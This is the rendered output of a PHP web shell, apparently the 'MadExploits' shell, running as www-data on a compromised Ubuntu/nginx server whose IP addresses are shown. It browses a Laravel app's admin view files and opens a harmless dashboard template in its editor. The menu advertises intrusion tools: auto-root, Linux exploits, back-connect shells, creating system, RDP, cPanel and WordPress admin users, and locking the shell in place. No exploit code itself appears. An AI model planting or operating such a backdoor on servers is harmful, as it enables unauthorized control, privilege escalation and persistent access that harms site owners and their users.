Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.159
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
sifaris /
resources /
views /
admin /
[ HOME SHELL ]
Name
Size
Permission
Action
access
[ DIR ]
drwxrwxr-x
address
[ DIR ]
drwxrwxr-x
admin_users
[ DIR ]
drwxrwxr-x
app_users
[ DIR ]
drwxrwxr-x
categories
[ DIR ]
drwxrwxr-x
dashboard
[ DIR ]
drwxrwxr-x
fiscal
[ DIR ]
drwxrwxr-x
layouts
[ DIR ]
drwxrwxr-x
offices
[ DIR ]
drwxrwxr-x
priorities
[ DIR ]
drwxrwxr-x
reports
[ DIR ]
drwxrwxr-x
sifaris_forms
[ DIR ]
drwxrwxr-x
sifaris_records
[ DIR ]
drwxrwxr-x
spatie
[ DIR ]
drwxrwxr-x
statuses
[ DIR ]
drwxrwxr-x
change_password.blade.php
2.39
KB
-rw-rw-r--
dashboard.blade.php
579
B
-rw-rw-r--
forgot-password.blade.php
712
B
-rw-rw-r--
login.blade.php
2.88
KB
-rw-rw-r--
media_manager.blade.php
606
B
-rw-rw-r--
my_profile.blade.php
1.12
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : dashboard.blade.php
@extends('admin.layouts.master') @section('title'){{config('app.name')}} @endsection @section('content') <div class="container-fluid p-0"> <h1 class="h3 mb-3">The dashboard</h1> <div class="row"> <div class="col-12"> <div class="card"> <div class="card-header"> <h5 class="card-title mb-0">Empty card</h5> </div> <div class="card-body"> </div> </div> </div> </div> </div> @endsection
Close